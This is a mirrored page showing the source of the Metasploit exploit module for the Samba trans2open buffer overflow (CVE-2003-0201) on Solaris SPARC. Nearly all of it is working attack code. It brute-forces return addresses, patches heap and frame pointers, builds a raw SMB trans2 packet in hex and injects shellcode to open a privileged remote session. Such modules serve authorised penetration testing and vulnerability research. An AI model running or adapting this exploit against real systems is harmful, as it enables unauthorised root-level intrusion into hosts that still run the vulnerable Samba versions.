Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/solaris/samba/trans2open.rb
19848 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GreatRanking

8


9
  include Msf::Exploit::Remote::SMB::Client

10
  include Msf::Exploit::Brute

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Samba trans2open Overflow (Solaris SPARC)',

17
        'Description' => %q{

18
          This exploits the buffer overflow found in Samba versions

19
          2.2.0 to 2.2.8. This particular module is capable of

20
          exploiting the flaw on Solaris SPARC systems that do not

21
          have the noexec stack option set. Big thanks to MC and

22
          valsmith for resolving a problem with the beta version of

23
          this module.

24
        },

25
        'Author' => [ 'hdm', 'jduck' ],

26
        'License' => MSF_LICENSE,

27
        'References' => [

28
          [ 'CVE', '2003-0201' ],

29
          [ 'OSVDB', '4469' ],

30
          [ 'BID', '7294' ],

31
          [ 'URL', 'https://seclists.org/bugtraq/2003/Apr/103' ]

32
        ],

33
        'Privileged' => true,

34
        'Payload' => {

35
          'Space' => 1024,

36
          'BadChars' => "\x00",

37
          'MinNops' => 512

38
        },

39
        'Platform' => 'solaris',

40
        'Targets' => [

41
          [

42
            'Samba 2.2.x - Solaris 9 (sun4u) - Bruteforce',

43
            {

44
              'PtrToNonZero' => 0xffbffffc, # near the bottom of the stack

45
              'Offset' => 1103,

46
              'Bruteforce' =>

47
                {

48
                  'Start' => { 'Ret' => 0xffbffaf0 },

49
                  'Stop' => { 'Ret' => 0xffbfa000 },

50
                  'Step' => 128

51
                }

52
            }

53
          ],

54
          [

55
            'Samba 2.2.x - Solaris 7/8 (sun4u) - Bruteforce',

56
            {

57
              'PtrToNonZero' => 0xffbefffc, # near the bottom of the stack

58
              'Offset' => 1103,

59
              'Bruteforce' =>

60
                {

61
                  'Start' => { 'Ret' => 0xffbefaf0 },

62
                  'Stop' => { 'Ret' => 0xffbea000 },

63
                  'Step' => 128

64
                }

65
            }

66
          ]

67
        ],

68
        'DefaultTarget' => 0,

69
        'DisclosureDate' => '2003-04-07',

70
        'Notes' => {

71
          'AKA' => ['ECHOWRECKER'],

72
          'Stability' => [ CRASH_SERVICE_RESTARTS, ],

73
          'Reliability' => [ REPEATABLE_SESSION, ],

74
          'SideEffects' => [ IOC_IN_LOGS, ]

75
        }

76
      )

77
    )

78


79
    register_options([

80
      Opt::RPORT(139)

81
    ])

82


83
    deregister_options('SMB::ProtocolVersion')

84
  end

85


86
  def brute_exploit(addrs)

87
    curr_ret = addrs['Ret']

88
    print_status('Trying return address 0x%.8x...' % curr_ret)

89


90
    connect(versions: [1])

91
    smb_login

92


93
    #

94
    # The obstacle course:

95
    # 	outsize = smb_messages[type].fn(conn, inbuf,outbuf,size,bufsize);

96
    # 	smb_dump(smb_fn_name(type), 0, outbuf, outsize);

97
    # 	return(outsize);

98
    #

99


100
    # This value *must* be 1988 to allow findrecv shellcode to work

101
    pattern = rand_text_english(1988)

102


103
    #

104
    # This was tested against sunfreeware samba 2.2.7a / solaris 9 / sun4u

105
    #

106
    # Patch the overwritten heap pointers

107
    # substr($pattern, 1159, 4, pack('N', $target->[4]));

108
    # substr($pattern, 1163, 4, pack('N', $target->[4]));

109
    #

110
    # >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0

111
    # substr($pattern, 1195, 4, pack('N', 0xffffffff));

112
    #

113
    # Fix the frame pointer (need to check for null in address)

114
    # substr($pattern, 1243, 4, pack('N', $target->[3]-64));

115
    #

116
    # Finally set the return address

117
    # substr($pattern, 1247, 4, pack('N', $curr_ret));

118
    #

119


120
    #

121
    # This method is more reliable against a wider range of targets

122
    #

123


124
    off = target['Offset']

125
    ptr_to_non_zero = target['PtrToNonZero']

126


127
    # Local variable pointer patches for early versions of 2.2.x

128
    pattern[off, 36] = [ptr_to_non_zero - 1024].pack('N') * 9

129
    off += 36

130


131
    # Overwrite heap pointers with a ptr to NULL at the top of the stack

132
    pattern[off, 40] = [ptr_to_non_zero - 1024].pack('N') * 10

133
    off += 40

134


135
    # Patch the type index into the smb_messages[] array...

136
    # >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0

137
    pattern[off, 20] = [0xffffffff].pack('N') * 5

138
    off += 20

139


140
    # This stream covers the framepointer and the return address

141
    pattern[off, 400] = [curr_ret].pack('N') * 100

142


143
    # Stuff the shellcode into the request

144
    pattern[3, payload.encoded.length] = payload.encoded

145


146
    trans =

147
      "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00" \

148
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" \

149
      "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00" \

150
      "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01" \

151
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \

152
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90" +

153
      pattern

154


155
    sock.put(trans)

156
    handler

157
    disconnect

158
  rescue EOFError

159
    print_error(e.to_s)

160
  rescue StandardError => e

161
    print_error(e.to_s)

162
  end

163
end

164


165